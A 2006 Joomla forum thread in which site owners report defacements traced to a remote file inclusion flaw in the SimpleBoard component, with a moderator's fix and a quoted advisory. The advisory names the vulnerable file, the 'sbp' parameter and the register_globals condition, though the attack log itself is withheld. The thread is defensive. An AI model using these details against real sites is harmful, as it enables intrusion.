[UPGRADE AVAIL.] Vulnerability in SIMPLEBOARD
Moderator: General Support Moderators
Forum rules
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
[UPGRADE AVAIL.] Vulnerability in SIMPLEBOARD
The FacileForms site today also got defaced by somebody calling himself GokTurk, he replaced configuration.php.
We are running joomla 1.0.10. We were before running mambo 4.5.2 and never had any such problem.
From the server logs it could also be a vulnerability in com_docman instead of Joomla itself, but this is yet unconfirmed.
The offending IP was 85.108.211.155, belonging to TurkTelecom. All IP's of TurkTelecom have been locked out from the FacileForms for security, and I highly recommend every Joomla user to do the same until this security hole is fixed. Also make sure your configuration.php is write protected (chmod 444)
We are running joomla 1.0.10. We were before running mambo 4.5.2 and never had any such problem.
From the server logs it could also be a vulnerability in com_docman instead of Joomla itself, but this is yet unconfirmed.
The offending IP was 85.108.211.155, belonging to TurkTelecom. All IP's of TurkTelecom have been locked out from the FacileForms for security, and I highly recommend every Joomla user to do the same until this security hole is fixed. Also make sure your configuration.php is write protected (chmod 444)
Last edited by RobS on Wed Jul 19, 2006 5:01 am, edited 1 time in total.
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
It would be extremely helpful if you could send me a copy of the relevant log information by PM or contact me by PM and I will give you my email address. I have seen a couple of reports of an issue but have not seen any logs or indication as to what they are actually doing.
Thanks
Thanks
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
- PhilTaylor-Prazgod
- Joomla! Ace
- Posts: 1402
- Joined: Sat Aug 20, 2005 12:32 pm
- Location: Jersey, Channel Islands
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
I personally helped someone yesterday who had Joomla 1.0.10 and got hacked - but it was a SimpleBoard hack and not a joomla hack
Phil Taylor
- https://mySites.guru - Manage Multiple Joomla/WordPress Sites In One Dashboard for Security, Audits, Backups and more....
- https://www.phil-taylor.com/
- https://mySites.guru - Manage Multiple Joomla/WordPress Sites In One Dashboard for Security, Audits, Backups and more....
- https://www.phil-taylor.com/
- brian
- Joomla! Master
- Posts: 12785
- Joined: Fri Aug 12, 2005 7:19 am
- Location: Leeds, UK
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Yes well I posted a known vulnerability announcement in this forum about simpleboard sometime ago.
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
I cannot exclude simpleboard at this time, but I'm still anayzing the logs.
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Correct, there have also been reports of another vulnerability in Simpleboard that we are investigating. From what I understand, Simpleboard isn't maintained for Joomla anymore and was replaced by an offshoot Joomlaboard. I have tried to go to the Simpleboard maintainer's website but it is having issues.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
-
- Joomla! Apprentice
- Posts: 5
- Joined: Mon Jul 10, 2006 11:57 am
Re: WARNING: Vulnerability in SIMPLEBOARD
Same problem at one of our sites this morning ... someone calling himself ENO7 TURKISH HACKER replaced the configuration.php with some html code displaying his message and a picture.
We are running joomla 1.0.10 since it was released, there was also phpBB2 component installed, but no simpleboard.
The process is currently under investigation.
Regards,
Mike
We are running joomla 1.0.10 since it was released, there was also phpBB2 component installed, but no simpleboard.
The process is currently under investigation.
Regards,
Mike
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Is anyone on your server running php-Nuke Peter? This idiot has mainly gone after php-Nuke sites. GokTurk and the sanalkabus.org attacks have been from the same origin and so far, have relied on incorrect file permissions and register_globals ON to get in.
He is usually very obliging, and tells you which files have been defaced (usually index.php and configuration.php) and doesn't touch anything else. I hope your attack is nothing more than this.
He is usually very obliging, and tells you which files have been defaced (usually index.php and configuration.php) and doesn't touch anything else. I hope your attack is nothing more than this.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
Open Source Research & Best Practice: http://osprojects.info
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
Yes, it finally is simpleboard!
We were running simpleboard, allthough all in read-only as reference for old posts (we are on SMF since 2 months now)
This is the offending entry from the log file:
I HIGHLY RECOMMEND EVERYBODY WITH SIMPLEBOARD INSTALLED TO DISABLE IT IMMEDIATELY BY RENAMING THE FOLDER /components/com_simpleboard UNTIL A FIX FOR THE PROBLEM IS FOUND. UNPUBLISHING IT WILL NOT HELP, EITHER RENAME AS ADVISED OR UNINSTALL COMPLETELY.
We were running simpleboard, allthough all in read-only as reference for old posts (we are on SMF since 2 months now)
This is the offending entry from the log file:
Code: Select all
Code removed for security.
Last edited by Anonymous on Mon Jul 10, 2006 12:47 pm, edited 1 time in total.
- PhilTaylor-Prazgod
- Joomla! Ace
- Posts: 1402
- Joined: Sat Aug 20, 2005 12:32 pm
- Location: Jersey, Channel Islands
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
I saw an example with file_upload.php and not image_upload.php
Phil Taylor
- https://mySites.guru - Manage Multiple Joomla/WordPress Sites In One Dashboard for Security, Audits, Backups and more....
- https://www.phil-taylor.com/
- https://mySites.guru - Manage Multiple Joomla/WordPress Sites In One Dashboard for Security, Audits, Backups and more....
- https://www.phil-taylor.com/
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
We were made aware of the vulnerability in image_upload a day or two ago. I have since attempted to contact the developers of SimpleBoard/JoomlaBoard but have not heard back as of yet. They should be aware of both issues now.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
@Peter Koch,
Could you please PM me the relevant log.
Thankyou.
Could you please PM me the relevant log.
Thankyou.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
- LorenzoG
- Joomla! Hero
- Posts: 2983
- Joined: Fri Aug 19, 2005 8:46 am
- Location: Stockholm, Sweden
Re: WARNING: Vulnerability in SIMPLEBOARD
Does anyone know if this vulnerability also affect joomlaboard?
Thanks
Thanks
Industributik - http://www.industributiken.se
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
I am not sure how long ago the deviation occured but to be on the safe side, I would assume that it does.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
Rob, I am preparing a complete log of all his activities and will PM it to you in short.
-
- Joomla! Explorer
- Posts: 251
- Joined: Mon Sep 05, 2005 3:50 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
To be on the safe side, I've renamed my com_joomlaboard directories, but after reviewing the SimpleBoard and the JoomlaBoard code, I believe this is a SimpleBoard only problem. Unfortunately since the exploit has been edited from the forum and I'm not one of those people "in the know" I can't say for certain.
RobS (or anyone else) - If you need an extra hand investigating this, feel free contact me. I'm on the east coast of the US so my day is just starting.
david
RobS (or anyone else) - If you need an extra hand investigating this, feel free contact me. I'm on the east coast of the US so my day is just starting.
david
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Upon further investigation and a helpful suggestion by Elpie and Counterpoint at mamboguru.com who posted this http://forum.joomla.org/index.php/topic,75390.0.html
It seems that the problem that is facing both com_extcalender and com_simpleboard is a lack of valid component checking making it possible to call the php files for those components directly and additionally, include more PHP from a remote site into the code to execute.
I have checked Simpleboard 1.1.0 and it does have this problem however Joomlaboard 1.1.2 should NOT be affected by this problem. You have a couple of options for dealing with this problem. 1. Update your Simpleboard installations to Joomlaboard. 2. Manually insert the necessary code into all files installed by Simpleboard and com_ExtCalendar (Extended Calender 2) if you happen to be running that.
This code should be in all files installed by com_simpleboard and com_extcalender. Basically, everything in /path/to/Joomla/components/com_extcalender, /path/to/Joomla/administrator/components/com_extcalender, /path/to/Joomla/components/com_simpleboard, and /path/to/Joomla/administrator/components/com_simpleboard
Refer to this link for more information about extCalender: http://forum.joomla.org/index.php/topic,75390.0.html
It seems that the problem that is facing both com_extcalender and com_simpleboard is a lack of valid component checking making it possible to call the php files for those components directly and additionally, include more PHP from a remote site into the code to execute.
I have checked Simpleboard 1.1.0 and it does have this problem however Joomlaboard 1.1.2 should NOT be affected by this problem. You have a couple of options for dealing with this problem. 1. Update your Simpleboard installations to Joomlaboard. 2. Manually insert the necessary code into all files installed by Simpleboard and com_ExtCalendar (Extended Calender 2) if you happen to be running that.
This code should be in all files installed by com_simpleboard and com_extcalender. Basically, everything in /path/to/Joomla/components/com_extcalender, /path/to/Joomla/administrator/components/com_extcalender, /path/to/Joomla/components/com_simpleboard, and /path/to/Joomla/administrator/components/com_simpleboard
Code: Select all
// no direct access
defined( '_VALID_MOS' ) or die( 'Restricted access' );
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
-
- Joomla! Fledgling
- Posts: 1
- Joined: Mon Jul 10, 2006 4:24 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
TITLE:
Mambo SimpleBoard Component "sbp" File Inclusion Vulnerability
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
SimpleBoard 1.x (component for Mambo)
http://secunia.com/product/10318/
DESCRIPTION:
h4ntu has discovered a vulnerability in the SimpleBoard component for
Mambo, which can be exploited by malicious people to compromise a
vulnerable system.
Input passed to the "sbp" parameter in
components/com_simpleboard/image_upload.php isn't properly verified,
before it is used to include files. This can be exploited to include
arbitrary files from external and local resources.
Successful exploitation requires that "register_globals" is enabled.
The vulnerability has been confirmed in version 1.1.0. Other versions
may also be affected.
SOLUTION:
Edit the source code to ensure that input is properly verified.
Set "register_globals" to "Off".
PROVIDED AND/OR DISCOVERED BY:
h4ntu
ORIGINAL ADVISORY:
http://milw0rm.com/exploits/1994
Anyone can tell me where i should moderate the file?
EDIT: Topic merged
Mambo SimpleBoard Component "sbp" File Inclusion Vulnerability
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
SimpleBoard 1.x (component for Mambo)
http://secunia.com/product/10318/
DESCRIPTION:
h4ntu has discovered a vulnerability in the SimpleBoard component for
Mambo, which can be exploited by malicious people to compromise a
vulnerable system.
Input passed to the "sbp" parameter in
components/com_simpleboard/image_upload.php isn't properly verified,
before it is used to include files. This can be exploited to include
arbitrary files from external and local resources.
Successful exploitation requires that "register_globals" is enabled.
The vulnerability has been confirmed in version 1.1.0. Other versions
may also be affected.
SOLUTION:
Edit the source code to ensure that input is properly verified.
Set "register_globals" to "Off".
PROVIDED AND/OR DISCOVERED BY:
h4ntu
ORIGINAL ADVISORY:
http://milw0rm.com/exploits/1994
Anyone can tell me where i should moderate the file?
EDIT: Topic merged
Last edited by infograf768 on Mon Jul 10, 2006 4:55 pm, edited 1 time in total.
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
We are aware of the problem and have addressed it in other topics on this board.
See: http://forum.joomla.org/index.php/topic,75390.0.html
And: http://forum.joomla.org/index.php/topic,75668.0.html
EDIT: Topic merged
See: http://forum.joomla.org/index.php/topic,75390.0.html
And: http://forum.joomla.org/index.php/topic,75668.0.html
EDIT: Topic merged
Last edited by infograf768 on Mon Jul 10, 2006 4:55 pm, edited 1 time in total.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
-
- Joomla! Enthusiast
- Posts: 218
- Joined: Fri Feb 17, 2006 4:30 pm
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Thanks for the update folks. Very helpful information.
I would like to know what is the effect to joomla if Global_regiser is OFF?
Need to do more research on this board I guess.
I would like to know what is the effect to joomla if Global_regiser is OFF?
Need to do more research on this board I guess.
[ http://www.MOSCOM.COM ] WebHosting 24x7 Phone Support.
[ http://www.KING.NET ] My Project ... converting to 1.6
[ http://www.KING.NET ] My Project ... converting to 1.6
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
None, Joomla! does not require register globals.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
-
- Joomla! Enthusiast
- Posts: 218
- Joined: Fri Feb 17, 2006 4:30 pm
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
thanks robs.RobS wrote: None, Joomla! does not require register globals.
[ http://www.MOSCOM.COM ] WebHosting 24x7 Phone Support.
[ http://www.KING.NET ] My Project ... converting to 1.6
[ http://www.KING.NET ] My Project ... converting to 1.6
-
- Joomla! Apprentice
- Posts: 25
- Joined: Tue Nov 15, 2005 4:59 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
had the same issues. the css files werent loading either. then i renamed the simpleboard folder and its fixed itself. weird.
and i thought i was the only one to be effected.
and i thought i was the only one to be effected.
- brian
- Joomla! Master
- Posts: 12785
- Joined: Fri Aug 12, 2005 7:19 am
- Location: Leeds, UK
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
CAn I respectfully suggest that people subscirbe to this forum for notifications of new posts.
I reported the vulnerability in simpleboard back on June 2
I reported the vulnerability in simpleboard back on June 2
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
You are pefectly right about the subscription.brian wrote: CAn I respectfully suggest that people subscirbe to this forum for notifications of new posts.
I reported the vulnerability in simpleboard back on June 2
However may I respectfully remark we are discussing here a new issue classified as highly critical in http://secunia.com/advisories/20981/, and not the moderately critical issue you posted back in june.
- brian
- Joomla! Master
- Posts: 12785
- Joined: Fri Aug 12, 2005 7:19 am
- Location: Leeds, UK
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Maybe so but the previous warning was still ignored.
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
-
- Joomla! Explorer
- Posts: 374
- Joined: Thu Aug 18, 2005 8:54 pm
Re: WARNING: Vulnerability in SIMPLEBOARD
I think it would be a wonderful new option for joomla to automaticly get a security warning when logging into the backend and one of the installed components has been detected as vulnerable. Joomla (and mambo) has all information such as component / mambot / module names and versions allready, and also all php / mysql / apache informations so nothing really stands against an implementation.brian wrote: Maybe so but the previous warning was still ignored.
After all the latest security issues around joomla / mambo and its hundrets of add-ons there should be urgently something be done to improve security even for those ten-thousands of users that never visit a forum or ask secunia.
But I guess this is not the thread to discuss it.
- brian
- Joomla! Master
- Posts: 12785
- Joined: Fri Aug 12, 2005 7:19 am
- Location: Leeds, UK
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
You are right. Perhaps if there was an rss feed filter component written for the admin that would read secunia and this forum for security announcements filtered on the words joomla
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
- PhilTaylor-Prazgod
- Joomla! Ace
- Posts: 1402
- Joined: Sat Aug 20, 2005 12:32 pm
- Location: Jersey, Channel Islands
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
I already have this set up in feeddemon :-)brian wrote: You are right. Perhaps if there was an rss feed filter component written for the admin that would read secunia and this forum for security announcements filtered on the words joomla
Phil Taylor
- https://mySites.guru - Manage Multiple Joomla/WordPress Sites In One Dashboard for Security, Audits, Backups and more....
- https://www.phil-taylor.com/
- https://mySites.guru - Manage Multiple Joomla/WordPress Sites In One Dashboard for Security, Audits, Backups and more....
- https://www.phil-taylor.com/
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: WARNING: Vulnerability in SIMPLEBOARD
Me too - mine's called "eyes"
Although, I have to say, with this latest crop of vulnerabilities I am spending some time hanging out with blackhats lately and find a quick daily check of proof of concept exploits has been very interesting.
Although, I have to say, with this latest crop of vulnerabilities I am spending some time hanging out with blackhats lately and find a quick daily check of proof of concept exploits has been very interesting.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
Open Source Research & Best Practice: http://osprojects.info